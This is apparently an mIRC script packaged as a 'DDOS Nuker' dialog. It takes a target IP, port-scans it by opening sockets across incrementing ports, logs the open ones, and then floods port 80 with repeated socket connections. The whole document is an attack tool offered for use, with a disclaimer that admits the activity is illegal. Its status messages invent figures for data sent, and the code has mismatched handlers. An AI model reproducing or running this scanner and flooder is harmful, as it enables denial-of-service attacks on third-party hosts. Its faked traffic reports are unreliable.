alias DDOSNuker {
.dialog -m DDOSNuker DDOSNuker
}
dialog DDOSNuker {
title "ShockWave DDOS Attack."
size -1 -1 150 60
option dbu
text "Important Note: Sending packets to other ips is an illegal industry and also a crime, the script author is not responsible for any trouble that might you have with your internet service provider (ISP) for violation of TOS. You can use this addon at your own risk.", 11, 2 2 148 35, ok tab 1
text Target: %targetip, 12, 27 40 65 25, ok tab 1
button "set", 13, 89 38 25 10, ok tab
text Control: , 14, 27 50 65 25, ok tab 1
Button "->ATTACK<-" , 15, 50 49 35 10, ok tab 1
Button "Exit" , 16, 88 49 25 10, ok tab 1
}
on 1:dialog

DOSNuker:sclick:*: {
if ($did == 13) { .set %targetip $$?="Enter Ip" | .dialog -c DDOSNuker DDOSNuker | ddosnuker }
if ($did == 15) { .remove victimports.txt | echo -s 12(14-12(14Nuker12)14-12)14 Attack Started On: %targetip | .set %attackid 0 | .goattack | .timer400 300 0 /goattack | .timer401 1 15 /sendpackets }
}
on *:sockopen:ddosattack*:{
if ($sockerr > 0) { return }
else { .echo 4 -s 12(14-12(14Nuker12)14-12)14 Open Hole On: %targetip on port $sock($sockname).port | .write victimports.txt $sock($sockname).port }
.sockclose $sockname
}
alias sendpackets {
if ($lines(victimports.txt) > 0) { .set %successpackets 0 | .set %randomattackport $read(victimports.txt,1) | .set %custompacket 0 | .timer402 10 0 /custompacket | .timer405 1 20 /successpackets }
else { .echo -s 12(14-12(14Nuker12)14-12)14 Attack Halted, Host Well Firewalled. }
}
alias successpackets {
.set %successpackets $calc(%packetsent * 24)
.echo -s 12(14-12(14Nuker12)14-12)14 ip attacked: %targetip
.echo -s 12(14-12(14Nuker12)14-12)14 psuedo data sent to port: $rand(21,300)
.echo -s 12(14-12(14Nuker12)14-12)14 $calc(%packetssent + 860) $+ Kbs Sent
.echo -s 12(14-12(14Nuker12)14-12)14 Operation Completed.
.write victimports.txt nothing open
}
on *:sockopen:ddosattack*:{
if ($sockerr > 0) { return }
else { .inc %packetssent }
.sockclose $sockname
}
alias custompacket {
.inc %custompacket
.sockopen ddosattack $+ $rand(999999,999999999) %targetip 80
}
alias goattack {
.inc %attackid
.sockopen ddosattack $+ %attackid %targetip %attackid
}